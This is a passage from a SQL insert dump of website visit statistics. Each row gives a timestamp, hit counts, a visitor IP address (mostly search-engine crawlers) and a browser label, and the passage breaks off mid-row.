(331483,1542159955,2,2,0,0,'8.29.198.25','other'),(331484,1542160108,1,1,0,0,'54.36.149.14','other'),(331485,1542160769,2,2,0,0,'173.211.85.254','chrome'),(331486,1542161014,4,4,0,0,'91.209.11.236','other'),(331487,1542161050,1,1,0,0,'54.36.148.45','other'),(331488,1542161177,1,1,0,0,'54.36.149.73','other'),(331489,1542161194,1,1,0,0,'66.249.66.44','chrome'),(331490,1542161585,1,1,0,0,'54.36.148.36','other'),(331491,1542161736,1,1,0,0,'54.36.149.9','other'),(331492,1542161906,1,1,0,0,'157.55.39.212','other'),(331493,1542162106,1,1,0,0,'54.36.148.21','other'),(331494,1542162276,1,1,0,0,'54.36.148.74','other'),(331495,1542162554,1,1,0,0,'54.36.148.170','other'),(331496,1542162969,1,1,0,0,'54.36.148.100','other'),(331497,1542162973,2,2,0,0,'216.244.66.241','other'),(331498,1542163158,1,1,0,0,'54.36.148.208','other'),(331499,1542163160,1,1,0,0,'54.36.149.1','other'),(331500,1542163290,1,1,0,0,'54.36.149.89','other'),(331501,1542163500,1,1,0,0,'54.36.148.91','other'),(331502,1542163653,1,1,0,0,'54.36.149.100','other'),(331503,1542163673,1,1,0,0,'54.36.148.206','other'),(331504,1542164124,1,1,0,0,'54.36.149.97','other'),(331505,1542164294,2,2,0,0,'35.167.197.14','chrome'),(331506,1542164354,1,1,0,0,'54.36.149.8','other'),(331507,1542164434,1,1,0,0,'54.36.149.61','other'),(331508,1542164776,1,1,0,0,'54.36.148.250','other'),(331509,1542165056,1,1,0,0,'54.36.149.25','other'),(331510,1542165649,1,1,0,0,'66.249.66.156','chrome'),(331511,1542165692,1,1,0,0,'216.244.66.241','other'),(331512,1542165700,1,1,0,0,'66.249.66.154','chrome'),(331513,1542166298,1,1,0,0,'54.36.148.31','other'),(331514,1542166391,1,1,0,0,'46.229.168.140','other'),(331515,1542166599,1,1,0,0,'54.36.148.175','other'),(331516,1542166629,1,1,0,0,'54.36.148.250','other'),(331517,1542166968,1,1,0,0,'54.36.148.201','other'),(331518,1542167015,1,1,0,0,'54.36.148.185','other'),(331519,1542167047,1,1,0,0,'54.36.149.31','other'),(331520,1542167148,1,1,0,0,'54.36.149.95','other'),(331521,1542167320,3,3,0,0,'216.244.66.241','other'),(331522,1542168099,1,1,0,0,'95.163.255.63','other'),(331523,1542168102,1,1,0,0,'95.163.255.62','other'),(331524,1542168279,1,1,0,0,'54.36.148.63','other'),(331525,1542168419,1,1,0,0,'54.36.148.24','other'),(331526,1542168463,1,1,0,0,'54.36.148.222','other'),(331527,1542168590,1,1,0,0,'54.36.149.63','other'),(331528,1542168725,1,1,0,0,'54.36.148.243','other'),(331529,1542168879,1,1,0,0,'54.36.148.51','other'),(331530,1542168977,1,1,0,0,'54.36.148.136','other'),(331531,1542169098,7,7,0,0,'66.249.66.156','chrome'),(331532,1542169100,1,1,0,0,'54.36.148.202','other'),(331533,1542169114,5,5,0,0,'66.249.66.155','chrome'),(331534,1542169130,21,21,0,0,'66.249.66.152','chrome'),(331535,1542169134,7,7,0,0,'66.249.66.57','chrome'),(331536,1542169152,3,3,0,0,'66.249.66.44','chrome'),(331537,1542169181,9,9,0,0,'66.249.66.40','chrome'),(331538,1542169209,3,3,0,0,'66.249.66.61','chrome'),(331539,1542169215,4,4,0,0,'66.249.66.42','chrome'),(331540,1542169276,1,1,0,0,'8.29.198.27','other'),(331541,1542169298,2,2,0,0,'66.249.66.59','chrome'),(331542,1542169383,14,14,0,0,'66.249.66.154','chrome'),(331543,1542169595,1,1,0,0,'54.36.148.115','other'),(331544,1542169673,1,1,0,0,'54.36.148.160','other'),(331545,1542169938,1,1,0,0,'54.36.148.15','other'),(331546,1542170041,1,1,0,0,'66.249.66.157','chrome'),(331548,1542170094,17,17,0,0,'66.249.66.155','chrome'),(331550,1542170116,22,22,0,0,'66.249.66.152','chrome'),(331551,1542170159,3,3,0,0,'216.244.66.241','other'),(331552,1542170169,6,6,0,0,'66.249.66.156','chrome'),(331553,1542170203,1,1,0,0,'207.46.13.169','other'),(331554,1542170304,2,2,0,0,'66.249.66.154','chrome'),(331555,1542170632,1,1,0,0,'54.36.148.57','other'),(331556,1542170710,1,1,0,0,'54.36.149.99','other'),(331557,1542170797,2,2,0,0,'8.29.198.25','other'),(331558,1542171089,1,1,0,0,'54.36.148.226','other'),(331559,1542171163,1,1,0,0,'216.244.66.241','other'),(331560,1542171177,1,1,0,0,'66.249.66.155','chrome'),(331561,1542171191,4,4,0,0,'66.249.66.152','chrome'),(331562,1542171243,2,2,0,0,'207.46.13.169','other'),(331563,1542171392,1,1,0,0,'54.36.148.50','other'),(331564,1542171403,2,2,0,0,'66.249.66.154','chrome'),(331565,1542171406,1,1,0,0,'54.36.148.21','other'),(331566,1542171407,2,2,0,0,'207.46.13.172','other'),(331567,1542171476,1,1,0,0,'54.36.149.69','other'),(331568,1542171494,1,1,0,0,'46.229.168.140','other'),(331569,1542171621,1,1,0,0,'66.249.66.61','chrome'),(331570,1542171622,1,1,0,0,'66.249.66.40','chrome'),(331571,1542171723,1,1,0,0,'54.36.149.34','other'),(331572,1542171968,1,1,0,0,'102.165.37.114','other'),(331573,1542171996,1,1,0,0,'46.229.168.138','other'),(331574,1542172152,1,1,0,0,'54.36.148.244','other'),(331575,1542172196,1,1,0,0,'54.36.149.3','other'),(331576,1542172210,1,1,0,0,'66.249.66.59','chrome'),(331577,1542172215,1,1,0,0,'66.249.66.42','chrome'),(331578,1542172388,1,1,0,0,'46.229.168.133','other'),(331579,1542172491,1,1,0,0,'157.55.39.212','other'),(331580,1542172585,1,1,0,0,'54.36.149.48','other'),(331581,1542172874,1,1,0,0,'54.36.148.93','other'),(331582,1542172891,1,1,0,0,'54.36.148.115','other'),(331583,1542172916,1,1,0,0,'54.36.149.60','other'),(331584,1542173062,2,2,0,0,'216.244.66.241','other'),(331585,1542173547,2,2,0,0,'207.46.13.235','other'),(331586,1542173849,1,1,0,0,'207.46.13.241','other'),(331587,1542173858,1,1,0,0,'40.77.167.194','other'),(331588,1542173862,1,1,0,0,'40.77.167.222','other'),(331589,1542174169,2,2,0,0,'66.249.66.156','chrome'),(331590,1542174201,1,1,0,0,'54.36.148.127','other'),(331591,1542174239,1,1,0,0,'54.36.149.101','other'),(331592,1542174529,1,1,0,0,'46.229.168.140','other'),(331593,1542174744,1,1,0,0,'54.36.149.25','other'),(331594,1542174932,1,1,0,0,'54.36.148.10','other'),(331595,1542175093,1,1,0,0,'66.249.66.152','chrome'),(331596,1542175122,1,1,0,0,'54.36.148.133','other'),(331597,1542175199,1,1,0,0,'54.36.148.214','other'),(331598,1542175312,1,1,0,0,'54.36.149.41','other'),(331599,1542175361,1,1,0,0,'54.36.148.67','other'),(331600,1542175377,1,1,0,0,'54.36.149.84','other'),(331601,1542175403,4,4,0,0,'216.244.66.241','other'),(331602,1542175505,1,1,0,0,'54.36.148.231','other'),(331603,1542175558,1,1,0,0,'54.36.148.47','other'),(331604,1542175623,1,1,0,0,'54.36.148.53','other'),(331605,1542175728,1,1,0,0,'46.229.168.135','other'),(331606,1542175730,1,1,0,0,'46.229.168.143','other'),(331607,1542175836,1,1,0,0,'54.36.148.186','other'),(331608,1542176081,1,1,0,0,'54.36.149.72','other'),(331609,1542176197,1,1,0,0,'46.229.168.151','other'),(331610,1542176255,1,1,0,0,'54.36.149.88','other'),(331611,1542177015,1,1,0,0,'46.229.168.153','other'),(331612,1542177064,1,1,0,0,'54.36.148.186','other'),(331613,1542177221,1,1,0,0,'54.36.149.48','other'),(331614,1542177238,1,0,1,0,'66.249.66.40',''),(331615,1542177366,1,1,0,0,'207.46.13.207','other'),(331616,1542177451,1,1,0,0,'54.36.148.198','other'),(331617,1542177461,1,1,0,0,'66.249.66.154','chrome'),(331618,1542177480,1,1,0,0,'207.46.13.241','other'),(331619,1542177484,1,1,0,0,'40.77.167.194','other'),(331620,1542177490,1,1,0,0,'207.46.13.235','other'),(331621,1542177632,1,1,0,0,'54.36.148.53','other'),(331622,1542177656,4,4,0,0,'37.53.228.75','chrome'),(331623,1542177869,1,1,0,0,'54.36.149.77','other'),(331624,1542178024,2,2,0,0,'216.244.66.241','other'),(331625,1542178148,1,1,0,0,'54.36.149.45','other'),(331626,1542178281,3,3,0,0,'37.54.19.114','chrome'),(331627,1542178416,1,1,0,0,'54.36.149.48','other'),(331628,1542178491,1,1,0,0,'54.36.149.18','other'),(331629,1542178929,1,1,0,0,'46.229.168.137','other'),(331630,1542179079,2,2,0,0,'91.196.177.46','chrome'),(331631,1542179087,1,1,0,0,'66.249.66.156','chrome'),(331632,1542179088,1,1,0,0,'66.249.66.154','chrome'),(331633,1542179258,1,1,0,0,'54.36.149.70','other'),(331634,1542179429,1,1,0,0,'54.36.149.76','other'),(331635,1542179453,1,1,0,0,'54.165.59.7','other'),(331636,1542179486,1,1,0,0,'54.36.148.247','other'),(331637,1542179502,1,1,0,0,'54.36.149.89','other'),(331638,1542179658,1,1,0,0,'66.249.66.155','chrome'),(331639,1542179659,1,1,0,0,'66.249.66.152','chrome'),(331640,1542180099,1,1,0,0,'54.36.148.210','other'),(331641,1542180130,1,1,0,0,'8.29.198.26','other'),(331642,1542180386,1,1,0,0,'54.36.149.82','other'),(331643,1542180474,1,1,0,0,'54.36.148.253','other'),(331644,1542180600,1,1,0,0,'54.36.149.78','other'),(331645,1542180686,3,3,0,0,'216.244.66.241','other'),(331646,1542180918,1,1,0,0,'54.36.148.247','other'),(331647,1542180926,1,1,0,0,'46.229.168.132','other'),(331648,1542180929,1,1,0,0,'46.229.168.146','other'),(331649,1542180952,1,1,0,0,'54.36.148.251','other'),(331650,1542181080,1,1,0,0,'54.36.148.48','other'),(331651,1542181408,1,1,0,0,'54.36.148.223','other'),(331652,1542181410,1,1,0,0,'54.36.149.86','other'),(331653,1542181418,1,1,0,0,'54.36.148.110','other'),(331654,1542181469,1,1,0,0,'54.36.149.57','other'),(331655,1542181528,1,1,0,0,'54.36.148.237','other'),(331656,1542181638,2,2,0,0,'8.29.198.27','other'),(331657,1542181917,1,1,0,0,'54.36.148.159','other'),(331658,1542182167,1,1,0,0,'207.46.13.169','other'),(331659,1542182223,1,1,0,0,'54.36.148.105','other'),(331660,1542182304,3,3,0,0,'216.244.66.241','other'),(331661,1542183132,2,2,0,0,'178.92.25.202','firefox'),(331662,1542183478,2,2,0,0,'95.132.26.252','firefox'),(331663,1542183796,2,2,0,0,'157.55.39.212','other'),(331664,1542183887,1,1,0,0,'54.36.149.84','other'),(331665,1542183902,2,2,0,0,'91.196.178.65','firefox'),(331666,1542183976,1,1,0,0,'54.36.148.186','other'),(331667,1542184079,1,1,0,0,'54.36.148.74','other'),(331668,1542184255,1,1,0,0,'193.107.179.164','chrome'),(331669,1542184288,1,1,0,0,'54.36.148.141','other'),(331670,1542184308,3,3,0,0,'54.165.59.7','other'),(331671,1542184365,1,1,0,0,'207.46.13.207','other'),(331672,1542184673,1,1,0,0,'54.36.148.238','other'),(331673,1542184676,1,1,0,0,'46.229.168.137','other'),(331674,1542184795,1,1,0,0,'54.36.149.9','other'),(331675,1542184850,1,1,0,0,'54.36.148.25','other'),(331676,1542185051,1,1,0,0,'54.36.148.38','other'),(331677,1542185053,1,1,0,0,'54.36.149.60','other'),(331678,1542185090,1,1,0,0,'91.196.178.79','chrome'),(331679,1542185155,1,1,0,0,'54.36.149.86','other'),(331680,1542185433,1,1,0,0,'54.36.148.174','other'),(331681,1542185687,3,3,0,0,'91.196.178.65','firefox'),(331682,1542185753,1,1,0,0,'109.201.154.214','other'),(331683,1542186021,3,3,0,0,'216.244.66.241','other'),(331684,1542186078,1,1,0,0,'54.36.148.170','other'),(331685,1542186310,1,1,0,0,'46.229.168.146','other'),(331686,1542186313,1,1,0,0,'46.229.168.130','other'),(331687,1542186523,2,2,0,0,'95.132.60.239','firefox'),(331688,1542186625,1,1,0,0,'54.36.149.44','other'),(331689,1542186663,1,1,0,0,'54.36.148.114','other'),(331690,1542186762,1,1,0,0,'207.46.13.172','other'),(331691,1542186804,1,1,0,0,'54.36.149.93','other'),(331692,1542187052,1,1,0,0,'54.36.149.104','other'),(331693,1542187177,1,1,0,0,'46.229.168.143','other'),(331694,1542187250,1,1,0,0,'54.36.148.59','other'),(331695,1542187313,1,1,0,0,'54.36.148.246','other'),(331696,1542187397,1,1,0,0,'46.229.168.149','other'),(331697,1542187568,2,2,0,0,'95.132.21.19','firefox'),(331698,1542187580,1,1,0,0,'193.0.247.178','firefox'),(331699,1542187614,1,1,0,0,'54.36.149.14','other'),(331700,1542187858,1,1,0,0,'13.66.139.0','other'),(331701,1542188270,2,2,0,0,'130.180.218.4','chrome'),(331702,1542188294,4,4,0,0,'216.244.66.241','other'),(331703,1542188473,1,1,0,0,'207.46.13.207','other'),(331704,1542188488,1,1,0,0,'178.95.246.220','chrome'),(331705,1542188535,1,1,0,0,'54.36.148.83','other'),(331706,1542188764,1,1,0,0,'46.229.168.136','other'),(331707,1542188935,2,2,0,0,'91.196.177.110','firefox'),(331708,1542188949,1,1,0,0,'54.36.148.164','other'),(331709,1542189570,1,1,0,0,'54.36.148.65','other'),(331710,1542189714,1,1,0,0,'54.36.148.129','other'),(331711,1542189770,1,1,0,0,'54.36.148.13','other'),(331712,1542189790,1,1,0,0,'54.36.148.48','other'),(331713,1542190246,2,2,0,0,'91.196.178.93','chrome'),(331714,1542190557,1,1,0,0,'54.36.149.21','other'),(331715,1542190583,1,1,0,0,'37.53.96.185','chrome'),(331716,1542190725,1,1,0,0,'54.36.148.110','other'),(331717,1542190932,3,3,0,0,'91.196.178.100','chrome'),(331718,1542190967,1,1,0,0,'8.29.198.27','other'),(331719,1542191437,1,1,0,0,'54.36.149.61','other'),(331720,1542191568,1,1,0,0,'157.55.39.212','other'),(331721,1542191655,1,1,0,0,'54.36.149.63','other'),(331722,1542191705,1,1,0,0,'54.36.148.241','other'),(331723,1542192028,1,1,0,0,'54.36.148.207','other'),(331724,1542192164,2,2,0,0,'91.196.178.93','chrome'),(331725,1542192349,1,1,0,0,'207.46.13.172','other'),(331726,1542192399,1,1,0,0,'54.36.148.128','other'),(331727,1542192477,1,1,0,0,'8.29.198.26','other'),(331728,1542192670,1,1,0,0,'54.36.148.108','other'),(331729,1542192970,1,1,0,0,'54.36.148.19','other'),(331730,1542193046,1,1,0,0,'54.36.148.58','other'),(331731,1542193068,1,1,0,0,'8.29.198.25','other'),(331732,1542193257,1,1,0,0,'46.229.168.153','other'),(331733,1542193258,1,1,0,0,'46.229.168.138','other'),(331734,1542193954,2,2,0,0,'216.244.66.241','other'),(331735,1542193979,1,1,0,0,'54.36.148.238','other'),(331736,1542194067,1,1,0,0,'54.36.148.117','other'),(331737,1542194109,1,1,0,0,'54.36.149.29','other'),(331738,1542194352,1,1,0,0,'54.36.149.13','other'),(331739,1542194423,1,1,0,0,'54.36.149.84','other'),(331740,1542195085,1,1,0,0,'54.36.148.240','other'),(331741,1542196076,2,2,0,0,'216.244.66.241','other'),(331742,1542196153,1,1,0,0,'66.249.66.154','chrome'),(331743,1542196302,5,5,0,0,'157.55.39.212','other'),(331744,1542196308,4,4,0,0,'207.46.13.169','other'),(331745,1542196312,3,3,0,0,'207.46.13.172','other'),(331746,1542196320,3,3,0,0,'207.46.13.207','other'),(331747,1542196325,1,1,0,0,'54.36.148.107','other'),(331748,1542196935,1,1,0,0,'54.36.148.44','other'),(331749,1542197365,1,1,0,0,'46.229.168.153','other'),(331750,1542197547,1,1,0,0,'54.36.149.58','other'),(331751,1542198080,1,1,0,0,'40.77.167.222','other'),(331752,1542198215,1,1,0,0,'207.46.13.207','other'),(331753,1542198472,1,1,0,0,'176.106.203.83','chrome'),(331754,1542198500,5,5,0,0,'216.244.66.241','other'),(331755,1542198580,2,2,0,0,'130.180.218.4','chrome'),(331756,1542198882,1,1,0,0,'207.46.13.241','other'),(331757,1542199083,2,2,0,0,'91.196.178.131','firefox'),(331758,1542199123,1,1,0,0,'54.36.148.104','other'),(331759,1542199423,1,1,0,0,'46.229.168.140','other'),(331760,1542199425,1,1,0,0,'46.229.168.150','other'),(331761,1542200372,2,2,0,0,'91.196.178.65','firefox'),(331762,1542200494,1,1,0,0,'54.36.148.149','other'),(331763,1542200751,1,1,0,0,'66.249.66.157','chrome'),(331764,1542200752,1,1,0,0,'66.249.66.154','chrome'),(331765,1542200965,1,1,0,0,'54.36.148.163','other'),(331766,1542201009,1,1,0,0,'93.78.185.135','msie'),(331767,1542201738,1,1,0,0,'66.249.66.154','chrome'),(331768,1542201761,1,1,0,0,'66.249.66.152','chrome'),(331769,1542201817,1,1,0,0,'8.29.198.25','other'),(331770,1542201851,1,1,0,0,'54.36.148.37','other'),(331771,1542201856,1,1,0,0,'54.36.148.238','other'),(331772,1542201907,2,0,2,0,'37.187.26.42',''),(331773,1542201942,1,1,0,0,'54.36.148.135','other'),(331774,1542202357,2,2,0,0,'91.196.178.65','firefox'),(331775,1542202942,1,1,0,0,'66.249.66.40','chrome'),(331776,1542203012,1,1,0,0,'91.196.178.180','chrome'),(331777,1542203257,1,1,0,0,'54.36.149.7','other'),(331778,1542203288,1,1,0,0,'54.36.148.254','other'),(331779,1542203330,1,1,0,0,'8.29.198.26','other'),(331780,1542203331,4,4,0,0,'178.154.244.29','other'),(331781,1542203335,3,3,0,0,'178.154.244.11','other'),(331782,1542203339,1,1,0,0,'54.36.148.219','other'),(331783,1542203361,1,1,0,0,'54.36.148.36','other'),(331784,1542203476,1,1,0,0,'54.36.148.252','other'),(331785,1542203537,6,6,0,0,'216.244.66.241','other'),(331786,1542203768,1,1,0,0,'5.45.207.79','other'),(331787,1542203867,1,1,0,0,'54.36.148.210','other'),(331788,1542203912,1,1,0,0,'8.29.198.27','other'),(331789,1542204073,10,10,0,0,'91.124.182.170','firefox'),(331790,1542204096,1,1,0,0,'54.36.149.82','other'),(331791,1542204148,1,1,0,0,'54.36.148.99','other'),(331792,1542204556,1,1,0,0,'54.36.148.188','other'),(331793,1542204615,1,1,0,0,'207.46.13.172','other'),(331794,1542204634,1,1,0,0,'91.196.178.93','chrome'),(331795,1542204709,1,1,0,0,'82.145.223.5','chrome'),(331796,1542205073,3,3,0,0,'91.124.182.170','firefox'),(331797,1542205080,1,1,0,0,'91.196.178.85','chrome'),(331798,1542205496,1,1,0,0,'64.246.165.200','firefox'),(331799,1542205589,2,2,0,0,'91.196.178.93','chrome'),(331800,1542205611,1,1,0,0,'178.94.20.137','chrome'),(331801,1542205762,1,1,0,0,'46.229.168.137','other'),(331802,1542205897,1,1,0,0,'54.36.148.97','other'),(331803,1542205975,1,1,0,0,'207.46.13.172','other'),(331804,1542206089,1,1,0,0,'157.55.39.212','other'),(331805,1542206370,1,1,0,0,'54.36.149.26','other'),(331806,1542206407,1,1,0,0,'95.163.255.104','other'),(331807,1542206412,1,1,0,0,'95.163.255.112','other'),(331808,1542206417,2,2,0,0,'95.163.255.102','other'),(331809,1542206422,1,1,0,0,'95.163.255.119','other'),(331810,1542206427,2,2,0,0,'95.163.255.115','other'),(331811,1542206439,1,1,0,0,'95.163.255.107','other'),(331812,1542206516,1,1,0,0,'54.36.148.100','other'),(331813,1542206579,6,6,0,0,'91.124.182.170','firefox'),(331814,1542206699,1,1,0,0,'54.36.148.58','other'),(331815,1542206700,1,1,0,0,'54.36.148.195','other'),(331816,1542206757,1,1,0,0,'54.36.148.65','other'),(331817,1542206797,1,1,0,0,'216.244.66.241','other'),(331818,1542207035,1,1,0,0,'91.196.178.93','chrome'),(331819,1542207061,3,3,0,0,'46.229.168.133','other'),(331820,1542207302,1,1,0,0,'54.36.149.37','other'),(331821,1542207359,2,2,0,0,'89.19.113.18','chrome'),(331822,1542207543,1,1,0,0,'46.229.168.152','other'),(331823,1542207584,1,1,0,0,'54.36.148.46','other'),(331824,1542207614,1,1,0,0,'54.36.148.42','other'),(331825,1542207627,1,1,0,0,'54.36.148.172','other'),(331826,1542207674,2,2,0,0,'91.196.178.71','firefox'),(331827,1542208246,2,2,0,0,'91.124.182.170','firefox'),(331828,1542208304,1,1,0,0,'54.36.149.89','other'),(331829,1542208472,1,1,0,0,'54.36.149.63','other'),(331830,1542208635,2,2,0,0,'95.132.1.92','firefox'),(331831,1542208781,5,5,0,0,'216.244.66.241','other'),(331832,1542208925,1,1,0,0,'54.36.148.114','other'),(331833,1542209222,3,3,0,0,'37.115.97.86','chrome'),(331834,1542209522,1,1,0,0,'46.229.168.146','other'),(331835,1542209878,2,2,0,0,'52.53.201.78','chrome'),(331836,1542210017,1,1,0,0,'54.36.148.170','other'),(331837,1542210288,1,1,0,0,'54.36.148.41','other'),(331838,1542210305,2,2,0,0,'178.154.244.11','other'),(331839,1542210346,5,5,0,0,'178.154.244.29','other'),(331840,1542210359,1,1,0,0,'54.36.148.171','other'),(331841,1542210855,1,1,0,0,'46.229.168.133','other'),(331842,1542211063,1,1,0,0,'54.36.148.131','other'),(331843,1542211174,1,1,0,0,'54.36.149.3','other'),(331844,1542211209,1,1,0,0,'5.45.207.79','other'),(331845,1542211275,4,4,0,0,'216.244.66.241','other'),(331846,1542211284,4,4,0,0,'178.154.244.11','other'),(331847,1542211412,3,3,0,0,'178.154.244.29','other'),(331848,1542211766,1,1,0,0,'54.36.148.111','other'),(331849,1542211828,1,1,0,0,'54.36.148.233','other'),(331851,1542211954,1,1,0,0,'54.36.149.90','other'),(331852,1542211978,1,1,0,0,'54.36.149.0','other'),(331853,1542212323,1,1,0,0,'216.244.66.241','other'),(331854,1542212560,1,1,0,0,'54.36.148.129','other'),(331855,1542212673,1,1,0,0,'8.29.198.25','other'),(331856,1542212917,1,1,0,0,'54.36.148.127','other'),(331857,1542212981,1,1,0,0,'207.46.13.207','other'),(331858,1542212985,2,2,0,0,'157.55.39.212','other'),(331859,1542213034,1,1,0,0,'54.36.148.68','other'),(331860,1542213141,1,1,0,0,'66.249.66.156','chrome'),(331861,1542213894,1,1,0,0,'157.55.39.212','other'),(331862,1542213925,1,1,0,0,'54.36.148.20','other'),(331863,1542213965,1,1,0,0,'54.36.148.217','other'),(331864,1542214162,2,2,0,0,'8.29.198.27','other'),(331865,1542214260,1,1,0,0,'54.36.148.52','other'),(331866,1542214279,1,1,0,0,'54.36.148.35','other'),(331867,1542214386,1,1,0,0,'207.46.13.172','other'),(331868,1542214403,2,2,0,0,'46.229.168.141','other'),(331869,1542214415,3,3,0,0,'216.244.66.241','other'),(331870,1542214492,1,1,0,0,'54.36.148.42','other'),(331871,1542215070,1,1,0,0,'54.36.148.252','other'),(331872,1542215234,1,1,0,0,'54.36.148.191','other'),(331873,1542215243,1,1,0,0,'54.36.148.175','other'),(331874,1542215411,1,1,0,0,'54.36.148.29','other'),(331875,1542215610,1,1,0,0,'54.36.148.206','other'),(331876,1542215973,4,4,0,0,'216.244.66.241','other'),(331877,1542216128,1,1,0,0,'91.124.93.237','msie'),(331878,1542216133,1,1,0,0,'54.36.148.218','other'),(331879,1542216450,1,1,0,0,'5.45.207.79','other'),(331880,1542216512,7,7,0,0,'178.154.244.29','other'),(331881,1542216516,1,1,0,0,'87.250.224.47','other'),(331882,1542216559,1,1,0,0,'95.108.213.4','other'),(331883,1542216581,1,1,0,0,'54.36.148.202','other'),(331884,1542216615,1,1,0,0,'46.229.168.151','other'),(331885,1542216617,1,1,0,0,'46.229.168.143','other'),(331886,1542216687,1,1,0,0,'54.36.148.17','other'),(331887,1542216869,2,2,0,0,'46.211.118.86','chrome'),(331888,1542217049,2,2,0,0,'46.229.168.149','other'),(331889,1542217178,2,2,0,0,'178.154.244.11','other'),(331890,1542217294,3,3,0,0,'216.244.66.241','other'),(331891,1542217313,1,1,0,0,'54.36.148.71','other'),(331892,1542217346,1,1,0,0,'46.229.168.140','other'),(331893,1542217348,1,1,0,0,'46.229.168.134','other'),(331894,1542217370,1,1,0,0,'5.45.207.79','other'),(331895,1542217386,1,1,0,0,'46.229.168.129','other'),(331896,1542217405,1,1,0,0,'5.173.248.157','other'),(331897,1542217415,1,1,0,0,'46.229.168.130','other'),(331898,1542217421,1,1,0,0,'54.36.148.112','other'),(331899,1542217444,1,1,0,0,'37.9.113.103','other'),(331900,1542217572,1,1,0,0,'54.36.148.203','other'),(331901,1542217575,1,1,0,0,'66.249.66.157','chrome'),(331902,1542217576,1,1,0,0,'66.249.66.154','chrome'),(331903,1542217589,1,1,0,0,'66.249.66.152','chrome'),(331904,1542217604,2,2,0,0,'178.154.244.29','other'),(331905,1542217616,1,1,0,0,'66.249.66.61','chrome'),(331906,1542217617,1,1,0,0,'66.249.66.44','chrome'),(331907,1542217779,1,1,0,0,'207.46.13.169','other'),(331908,1542217921,1,1,0,0,'54.36.148.242','other'),(331909,1542218025,1,1,0,0,'54.36.148.101','other'),(331910,1542218039,1,1,0,0,'46.229.168.146','other'),(331911,1542218107,2,2,0,0,'178.154.244.11','other'),(331912,1542218353,1,1,0,0,'54.36.149.81','other'),(331913,1542218360,1,1,0,0,'54.36.149.33','other'),(331914,1542218429,1,1,0,0,'54.36.148.186','other'),(331915,1542218700,1,1,0,0,'54.36.148.84','other'),(331916,1542218779,1,1,0,0,'46.229.168.143','other'),(331917,1542218781,1,1,0,0,'46.229.168.147','other'),(331918,1542218846,1,1,0,0,'54.36.148.54','other'),(331919,1542219114,1,1,0,0,'46.229.168.133','other'),(331920,1542219548,1,1,0,0,'66.249.66.61','chrome'),(331921,1542219549,1,1,0,0,'66.249.66.42','chrome'),(331922,1542219566,1,1,0,0,'54.36.148.30','other'),(331923,1542219640,1,1,0,0,'54.36.148.254','other'),(331924,1542219643,1,1,0,0,'54.36.148.227','other'),(331925,1542219740,1,1,0,0,'66.249.66.59','chrome'),(331926,1542219764,1,1,0,0,'66.249.66.40','chrome'),(331927,1542219803,3,3,0,0,'216.244.66.241','other'),(331928,1542220229,1,1,0,0,'54.36.149.100','other'),(331929,1542220340,1,1,0,0,'54.36.148.215','other'),(331930,1542220461,1,1,0,0,'54.36.149.54','other'),(331931,1542220764,1,1,0,0,'66.249.66.57','chrome'),(331932,1542220767,1,1,0,0,'66.249.66.42','chrome'),(331933,1542220826,1,1,0,0,'54.36.148.109','other'),(331934,1542220881,1,1,0,0,'54.36.148.176','other'),(331935,1542221149,2,2,0,0,'66.249.66.59','chrome'),(331936,1542221154,3,3,0,0,'66.249.66.40','chrome'),(331937,1542221184,1,1,0,0,'46.229.168.139','other'),(331938,1542221206,1,0,1,0,'66.249.66.152',''),(331939,1542221384,7,7,0,0,'216.244.66.241','other'),(331940,1542221408,2,2,0,0,'66.249.66.61','chrome'),(331941,1542221409,1,1,0,0,'69.197.177.50','other'),(331942,1542221417,5,5,0,0,'66.249.66.154','chrome'),(331943,1542221472,1,1,0,0,'54.36.148.171','other'),(331944,1542221607,1,1,0,0,'54.36.148.139','other'),(331945,1542221681,10,10,0,0,'144.76.29.149','other'),(331946,1542221731,12,12,0,0,'69.30.205.218','other'),(331947,1542221747,1,1,0,0,'66.249.66.156','chrome'),(331948,1542221753,1,1,0,0,'66.249.66.57','chrome'),(331949,1542221772,1,1,0,0,'66.249.66.44','chrome'),(331950,1542221841,1,1,0,0,'66.249.66.42','chrome'),(331951,1542221909,1,1,0,0,'54.36.148.86','other'),(331952,1542222021,1,1,0,0,'54.36.148.164','other'),(331953,1542222289,1,1,0,0,'54.36.149.90','other'),(331954,1542222473,3,3,0,0,'216.244.66.241','other'),(331955,1542222584,1,1,0,0,'5.45.207.79','other'),(331956,1542222629,2,2,0,0,'5.45.207.19','other'),(331957,1542222699,1,1,0,0,'66.249.66.156','chrome'),(331958,1542222813,1,1,0,0,'54.36.148.215','other'),(331959,1542222876,6,6,0,0,'178.154.244.11','other'),(331960,1542222881,7,7,0,0,'178.154.244.29','other'),(331961,1542223047,2,2,0,0,'66.249.66.59','chrome'),(331962,1542223050,2,2,0,0,'66.249.66.40','chrome'),(331963,1542223054,1,1,0,0,'87.250.224.65','other'),(331964,1542223069,1,1,0,0,'66.249.66.155','chrome'),(331965,1542223070,2,2,0,0,'66.249.66.152','chrome'),(331966,1542223114,1,1,0,0,'66.249.66.154','chrome'),(331967,1542223174,1,1,0,0,'46.229.168.148','other'),(331968,1542223287,1,1,0,0,'207.46.13.169','other'),(331969,1542223416,1,1,0,0,'66.249.66.44','chrome'),(331970,1542223492,1,1,0,0,'54.36.149.47','other'),(331971,1542223511,1,1,0,0,'8.29.198.26','other'),(331972,1542223616,1,1,0,0,'5.45.207.79','other'),(331973,1542223847,1,1,0,0,'54.36.148.15','other'),(331974,1542224012,1,1,0,0,'54.36.148.64','other'),(331975,1542224159,2,2,0,0,'66.249.66.155','chrome'),(331976,1542224175,1,1,0,0,'46.229.168.152','other'),(331977,1542224183,1,1,0,0,'66.249.66.152','chrome'),(331978,1542224197,1,1,0,0,'54.36.149.30','other'),(331979,1542224326,1,1,0,0,'54.36.148.205','other'),(331980,1542224356,4,4,0,0,'216.244.66.241','other'),(331981,1542224444,2,2,0,0,'66.249.66.154','chrome'),(331982,1542224474,1,1,0,0,'54.36.149.81','other'),(331983,1542224618,1,1,0,0,'66.249.66.42','chrome'),(331984,1542224650,1,1,0,0,'54.36.148.50','other'),(331985,1542224879,1,1,0,0,'54.36.148.14','other'),(331986,1542225003,1,1,0,0,'8.29.198.26','other'),(331987,1542225154,1,0,1,0,'66.249.66.40',''),(331988,1542225337,1,1,0,0,'54.36.149.30','other'),(331989,1542225396,3,2,1,0,'66.249.66.57',''),(331990,1542225397,2,2,0,0,'66.249.66.44','chrome'),(331991,1542225587,1,1,0,0,'8.29.198.25','other'),(331992,1542225765,1,1,0,0,'54.36.149.10','other'),(331993,1542225809,1,1,0,0,'54.36.148.58','other'),(331994,1542226207,2,1,1,0,'66.249.66.42',''),(331995,1542226270,1,1,0,